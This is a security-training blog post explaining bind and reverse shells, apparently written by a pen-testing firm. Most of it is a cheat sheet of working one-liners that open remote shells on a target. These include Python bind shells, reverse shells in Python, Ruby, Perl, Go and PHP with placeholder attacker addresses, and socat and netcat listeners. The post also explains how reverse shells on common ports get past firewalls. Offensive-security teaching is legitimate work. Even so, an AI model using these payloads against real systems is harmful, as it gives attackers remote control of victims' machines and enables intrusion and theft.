Popping Shells: When servers become puppets!
Introduction
In a remote attack scenario, the attacker takes control of the victim's machine using the reverse or bind shell technique. This cybersecurity blog post will explore reverse and bind shells in-depth, including illustrative examples. We will clarify what constitutes a reverse and bind shell and highlight their differences. Additionally, we will examine how attackers employ these shells to launch an attack and how to generate them using available tools.
Bind Shells
An attacker triggers a bind shell on a target machine to launch a command shell that listens on a local port. The attacker then connects to the target machine on the listening port and executes commands to take control of the machine.
Attack Scenario
The attacker delivers a malicious payload to the target machine after exploiting a vulnerability such as a file upload bypass, command injection, etc. When the payload is executed, a port will be opened on the target machine, and then an attacker will connect to the open port and take control of the target machine.
Issues with Bind Shell
Anyone can connect to the open bind shell, and an external attacker can take advantage of this scenario and take control of the target machine.
Firewalls have strict rules for inbound traffic filtering and prevent attackers from connecting to an open port on the target machine.
NAT/PAT translation can change the private IP address (RFC 1918) into different public IP addresses.
Bind Shell using Netcat
Netcat is a command-line interface (CLI) tool used to read/write data over TCP and UDP.
Download Netcat from here.
On Target's Machine
On Attacker's Machine
nc -nv 192.168.226.131 3333
Python Bind Shell
Use the below code to launch python bind shells on the target machine.
#Ipv4
python3 -c 'import socket,os,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((“<ip>",<port>));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);os.dup2(c.fileno(),1);os.dup2(c.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'
#Ipv6
python3 -c 'import socket,os,subprocess;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.bind(("<ip>",<port>,0,2));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);os.dup2(c.fileno(),1);os.dup2(c.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'
Reverse Shells
A reverse shell actively pushes a connection back to the attacker rather than waiting for the incoming connection. In this case, an attacker will open a local port and listen for a connection from the target machine.
Attack Scenario
The attacker delivers a malicious payload to the target machine after exploiting a vulnerability such as a file upload bypass, command injection, etc. When the payload is executed, the target will connect to the attacker on mentioned IP address & port. Then, the attacker will take control of the target machine.
Advantages of Reverse Shell
Reverse shells remove the need for a listener on a target machine; thus, the target machine is not vulnerable to other external attackers.
Reverse shells can use popular ports (e.g:80,443), usually allowed on egress connections from an internal to an external network, bypassing firewall restrictions.
We don't need to specify the remote host's IP address and therefore don't have to face NAT/PAT translation.
Reverse Shell using Netcat
Netcat can be used to create a listener for incoming reverse shells.
On Target Machine
On Attacker Machine
nc -lnvp 7878
Python Reverse Shell
Use the below code to launch python reverse shells on the target machine.
export RHOST="<IP>";export RPORT=<PORT>;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
python3 -c 'a=__import__;b=a("socket");p=a("subprocess").call;o=a("os").dup2;s=b.socket(b.AF_INET,b.SOCK_STREAM);s.connect(("IP",<PORT>));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p(["/bin/sh","-i"])'
Ruby Reverse Shell
Use the below code to launch ruby reverse shells on the target machine.
ruby -rsocket -e'exit if fork;c=TCPSocket.new("<IP>","<PORT>");loop{c.gets.chomp!;(exit! if $_=="exit");($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts "failed: #{$_}"}'
ruby -rsocket -e'f=TCPSocket.open("<IP>",<PORT>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)
Perl Reverse Shell
Use the below code to launch Perl reverse shells on the target machine.
perl -e 'use Socket;$i="<IP>";$p=<PORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<IP>:<PORT>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\
Go Reverse Shell
Use the below code to launch Go reverse shells on the target machine.
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","<IP>:<PORT>");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
PHP Reverse Shell
Use the below code to launch PHP reverse shells on the target machine.
php -r '$sock=fsockopen("<IP>",<PORT>);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("<IP>",<PORT>);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("<IP>",<PORT>);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
Reverse Shell using Socat
Socat can be used to create a listener for incoming reverse shells.
On Target Machine
socat tcp-connect:192.168.0.5:4444 system:/bin/sh
On Attacker Machine
socat -d -d TCP4-LISTEN:443 STDOUT
Tool to Generate Reverse Shells
Reverse-Shell-Generator: https://www.revshells.com
Revshellgen: CLI Reverse Shell generator https://github.com/t0thkr1s/revshellgen
Shellerator: https://github.com/ShutdownRepo/shellerator
Shellpop: https://github.com/0x00-0x00/ShellPop
Pyminifier: https://liftoff.github.io/pyminifier
References
Register for instructor-led online courses today!
Check out our free programs!
Reach out to us with your custom pen testing needs at: info@darkrelay.com or WhatsApp us
Yorumlar